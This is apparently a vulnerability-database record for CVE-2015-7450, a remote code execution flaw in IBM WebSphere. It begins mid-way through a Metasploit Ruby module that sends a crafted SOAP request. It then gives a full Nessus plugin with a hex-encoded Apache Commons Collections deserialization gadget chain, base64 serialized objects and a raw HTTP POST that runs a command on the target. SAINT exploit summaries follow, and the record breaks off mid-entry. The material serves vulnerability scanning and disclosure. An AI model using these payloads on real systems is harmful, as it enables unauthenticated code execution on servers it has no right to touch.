version='1.0' encoding='UTF-8'?>\" + \"\\r\\n\" \nreq += \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\">\" + \"\\r\\n\" \nreq += \"<SOAP-ENV:Header xmlns:ns0=\\\"admin\\\" ns0:WASRemoteRuntimeVersion=\\\"7.0.0.0\\\" ns0:JMXMessageVersion=\\\"1.0.0\\\" ns0:SecurityEnabled=\\\"true\\\" ns0:JMXVersion=\\\"1.2.0\\\">\" + \"\\r\\n\" \nreq += \"<LoginMethod>BasicAuth</LoginMethod>\" + \"\\r\\n\" \nreq += \"</SOAP-ENV:Header>\" + \"\\r\\n\" \nreq += \"<SOAP-ENV:Body>\" + \"\\r\\n\" \nreq += \"<ns1:getAttribute xmlns:ns1=\\\"urn:AdminService\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\" + \"\\r\\n\" \nreq += \"<objectname xsi:type=\\\"ns1:javax.management.ObjectName\\\">\" + inject_payload + \"</objectname>\" + \"\\r\\n\" \nreq += \"<attribute xsi:type=\\\"xsd:string\\\">ringBufferSize</attribute>\" + \"\\r\\n\" \nreq += \"</ns1:getAttribute>\" + \"\\r\\n\" \nreq += \"</SOAP-ENV:Body>\" + \"\\r\\n\" \nreq += \"</SOAP-ENV:Envelope>\" + \"\\r\\n\" \n \nuri = target_uri.path \n \nres = send_request_raw({ \n'method' => 'POST', \n'version' => '1.1', \n'raw_headers' => \"Content-Type: text/xml; charset=utf-8\" + \"\\r\\n\" + \"SOAPAction: \\\"urn:AdminService\\\"\" + \"\\r\\n\", \n'uri' => normalize_uri(uri), \n'data' => req \n}) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/141631/ibm_websphere_java_deserialize.rb.txt"}], "nessus": [{"lastseen": "2023-05-18T14:18:08", "description": "The remote IBM WebSphere Application Server is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted SOAP request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "nessus", "title": "IBM WebSphere Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2022-01-11T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server", "cpe:/a:ibm:http_server"], "id": "WEBSPHERE_JAVA_SERIALIZE.NASL", "href": "https://www.tenable.com/plugins/nessus/87171", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87171);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/11\");\n\n script_cve_id(\"CVE-2015-7450\");\n script_bugtraq_id(77653);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"IBM WebSphere Java Object Deserialization RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WebSphere Application Server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote IBM WebSphere Application Server is affected by a remote\ncode execution vulnerability due to unsafe deserialize calls of\nunauthenticated Java objects to the Apache Commons Collections (ACC)\nlibrary. An unauthenticated, remote attacker can exploit this, by\nsending a crafted SOAP request, to execute arbitrary code on the\ntarget host.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21970575\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate interim fix per the vendor advisory.\nAlternatively, ensure that all exposed ports used by the WebSphere\nApplication Server are firewalled from any public networks.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7450\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM WebSphere RCE Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_application_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"websphere_detect.nasl\", \"websphere_liberty_detect.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/WebSphere\");\n script_require_ports(\"Services/www\", 8880);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"string.inc\");\ninclude(\"http.inc\");\n\nappname = \"WebSphere\";\nos = get_kb_item_or_exit(\"Host/OS\");\nport = get_http_port(default:8880, embedded:FALSE);\nget_kb_item_or_exit(\"www/WebSphere/\" + port + \"/installed\");\n\nping_cmd = '';\nid_tag = hexstr(rand_str(length:10));\nif(\"windows\" >< tolower(os)) ping_cmd = \"ping -n 10 \";\nelse ping_cmd = \"ping -c 10 -p \" + string(id_tag) + \" \";\nping_cmd += compat::this_host();\n\n#\n# open connection to WebSphere.\n#\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL,port,appname);\n\n#\n# build SOAP request with arbitrary ping command\n#\nraddress = get_host_ip();\nrn = raw_string(0x0d, 0x0a);\n\nserObj = hex2raw(s:\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\");\nlen = strlen(ping_cmd);\nserObj += raw_string(len) + ping_cmd;\nserObj += hex2raw(s:\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\");\n\nserObjB64 = base64(str:serObj);\n\nser1 = \"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\";\nser2 = \"rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\";\nser3 = \"rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgAkY29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5TZXNzaW9uJ5mLeyYSGOUCAANKAAJpZFoADnNoYXJlV29ya3NwYWNlTAAIdXNlck5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cAAAAVEDKkaUAXQAEVNjcmlwdDE1MTAzMmE0Njk0\";\nser4 = \"rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\";\n\nxmlObj = \"<?xml version='1.0' encoding='UTF-8'?>\" + rn +\n'<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">' + rn +\n'<SOAP-ENV:Header ns0:JMXConnectorContext=\"'+ser1+'\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">' + rn +\n'</SOAP-ENV:Header>' + rn +\n'<SOAP-ENV:Body>' + rn +\n'<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">' + rn +\n'<objectname xsi:type=\"ns1:javax.management.ObjectName\">'+ser2+'</objectname>' + rn +\n'<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>' + rn +\n'<params xsi:type=\"ns1:[Ljava.lang.Object;\">'+serObjB64+'</params>' + rn +\n'<signature xsi:type=\"ns1:[Ljava.lang.String;\">'+ser4+'</signature>' + rn +\n'</ns1:invoke>' + rn +\n'</SOAP-ENV:Body>' + rn +\n'</SOAP-ENV:Envelope>';\n\ncontentLen = strlen(xmlObj);\n\ndata = \"POST / HTTP/1.0\" + rn +\n\"Host: \"+ raddress +\":\"+ string(port) + rn +\n\"Content-Type: text/xml; charset=utf-8\" + rn +\n\"Content-Length: \" + string(contentLen) + rn +\n'SOAPAction: \"urn:AdminService\"' + rn + rn +\nxmlObj;\n\nfilter = \"icmp and icmp[0] = 8 and src host \" + get_host_ip();\nresponse = send_capture(socket:soc, data:data, pcap_filter:filter);\nicmp = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(icmp) || (\"windows\" >!< tolower(os) && id_tag >!< icmp)) audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port:port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2021-07-28T14:33:26", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:C049B327B327D8889E6EDEE0F0EFB1CB", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:9C099C4B9A40BE916B04858EBBBB06B1", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-19T02:30:15", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 